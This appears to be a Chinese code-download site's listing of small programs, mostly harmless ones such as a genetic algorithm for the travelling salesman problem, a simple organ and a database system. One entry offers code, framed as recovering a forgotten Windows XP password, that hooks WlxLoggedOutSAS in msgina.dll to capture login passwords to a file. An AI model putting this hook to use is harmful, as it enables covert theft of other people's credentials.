-
遗传算法小程序,关于解决TSP问题的遗传算法,仅供参考
遗传算法小程序,关于解决TSP问题的遗传算法,仅供参考-GA small program on the settlement of the TSP Genetic Algorithm for reference purposes only and interact more
- 2022-02-02 01:23:44下载
- 积分:1
-
一个小程序,用来展示瀑布的样子,用到了许多数学公式,值得一看...
一个小程序,用来展示瀑布的样子,用到了许多数学公式,值得一看-a small program used to display waterfall on the outside, use a lot of mathematical formulas, an eye-catcher
- 2022-05-16 06:34:14下载
- 积分:1
-
可以让你同时选择多行,可以添加背景等等,这个一个比较齐全功能的...
可以让你同时选择多行,可以添加背景等等,这个一个比较齐全功能的-At the same time allows you to select multiple lines, you can add backgrounds and so on, the function of a more complete
- 2022-04-21 21:54:36下载
- 积分:1
-
简易电子琴,本程序只能单线程发音,即单音发音,具有一小点控制节奏的功能。...
简易电子琴,本程序只能单线程发音,即单音发音,具有一小点控制节奏的功能。-a simple electronic organ that can sounds a single sound, with a little tempo control.
- 2023-07-06 05:30:03下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
ISAM 数据库开发系统(可使用BC.VC系统编译)
ISAM 数据库开发系统(可使用BC.VC系统编译)-ISAM database development system (system can be used BC.VC compiler)
- 2022-07-10 11:11:28下载
- 积分:1
-
C system of the code was developed for the White Box category C code and example...
C++系统中对自己编制的代码进行白盒测试的C++代码类及例子-C system of the code was developed for the White Box category C code and examples
- 2023-03-07 06:30:03下载
- 积分:1
-
a simply programe for scrolling text in direction selected
a simply programe for scrolling text in direction selected-a simply programe for scrolling text in dir ection selected
- 2023-01-28 09:20:03下载
- 积分:1
-
用指向指针的指针变量访问一维和二维数组
用C语言编制,用于对一维或二维数组的指针间接访问...
用指向指针的指针变量访问一维和二维数组
用C语言编制,用于对一维或二维数组的指针间接访问-indicators used at the target variable visit one-and two-dimensional arrays in C language for the right one-dimensional or two-dimensional array of indirect indicators visit
- 2022-02-20 03:55:31下载
- 积分:1
-
通过GPRS modem 计算机串口相连,实现GPRS的短线收发和数据传输!...
通过GPRS modem 计算机串口相连,实现GPRS的短线收发和数据传输!-GPRS modem through the serial port connected to the computer to achieve the short-term GPRS transceiver and data transmission!
- 2022-12-19 04:15:03下载
- 积分:1